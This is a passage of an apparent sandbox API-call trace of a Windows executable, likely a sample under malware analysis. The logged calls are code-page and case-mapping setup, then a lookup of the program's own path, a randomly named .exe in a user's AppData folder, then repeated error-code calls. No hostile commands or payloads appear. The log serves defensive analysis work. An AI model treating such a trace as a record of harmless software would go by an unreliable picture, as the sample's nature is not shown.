lpUsedDefaultChar=0x0) returned 1033 [0099.366] FreeEnvironmentStringsW (penv=0x1afd68) returned 1 [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] GetACP () returned 0x4e4 [0099.366] GetLastError () 
returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.366] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0099.366] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0099.367] GetLastError () returned 0x6 [0099.367] SetLastError (dwErrCode=0x6) [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.367] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0099.367] GetLastError () returned 0x6 [0099.367] SetLastError (dwErrCode=0x6) [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, 
cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ") returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0099.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\
x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x73\x53\x54\xdb\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0099.367] GetLastError () returned 0x6 [0099.367] SetLastError (dwErrCode=0x6) [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ") returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, 
lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0099.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x73\x53\x54\xdb\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0099.368] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () 
returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () 
returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () 
returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () 
